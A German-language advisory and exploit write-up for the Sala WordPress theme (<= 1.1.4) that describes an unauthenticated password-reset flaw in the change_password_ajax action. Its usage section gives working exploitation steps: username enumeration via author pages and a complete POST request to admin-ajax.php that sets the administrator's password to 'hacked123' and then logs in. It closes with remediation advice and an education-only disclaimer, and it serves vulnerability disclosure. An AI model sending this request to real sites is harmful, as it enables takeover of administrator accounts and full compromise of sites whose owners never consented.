
Sala - Startup- & SaaS-WordPress-Theme <= 1.1.4 - Unauthentifizierte Privilegieneskalation über Passwort-Reset/Kontoübernahme
🔥 Zusammenfassung der Schwachstelle
Das WordPress-Theme Sala ist in Versionen <= 1.1.4 anfällig für eine unauthentifizierte Rechteausweitung (Privilege Escalation). Dieser Fehler ermöglicht es unauthentifizierten Angreifern, die Passwörter beliebiger Benutzer – einschließlich Administratoren – zurückzusetzen, indem sie einen offen zugänglichen AJAX-Endpunkt direkt aufrufen, ohne die Identität des Anfragenden zu verifizieren.
Diese Schwachstelle resultiert aus der Funktion change_password_ajax, die über wp_ajax_nopriv_ registriert ist und für jeden gültigen Benutzer-Login ein neues Passwort festlegt, ohne zu überprüfen, ob die Anfrage autorisiert ist.
🔍 Betroffenes Theme
🧪 Exploit-Funktionen
/wp-admin/admin-ajax.php?action=change_password_ajax🧠 Forscher
🚀 Verwendung
Ermitteln Sie einen gültigen Benutzernamen auf der Ziel-WordPress-Seite. Dies können Sie tun, indem Sie Folgendes überprüfen:
/author/username)Erstellen Sie die folgende POST-Anfrage, um das Passwort des Benutzers zurückzusetzen:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
Bei Erfolg können Sie sich nun mit dem neuen Passwort (hacked123 im obigen Beispiel) als der anvisierte Benutzer anmelden.
Rufen Sie /wp-login.php auf und verifizieren Sie den Zugriff.
🛠 Empfehlungen zur Behebung
wp_ajax_nopriv_change_password_ajax entfernen oder absichern.is_user_logged_in() und verifizieren Sie die Identität des Benutzers, bevor sensible Aktionen zugelassen werden.🔒 Haftungsausschluss:
Diese Informationen werden ausschließlich zu Bildungs- und autorisierten Penetrationstest-Zwecken bereitgestellt. Die unbefugte Ausnutzung von Systemen ist illegal und unethisch.
📚 Referenz: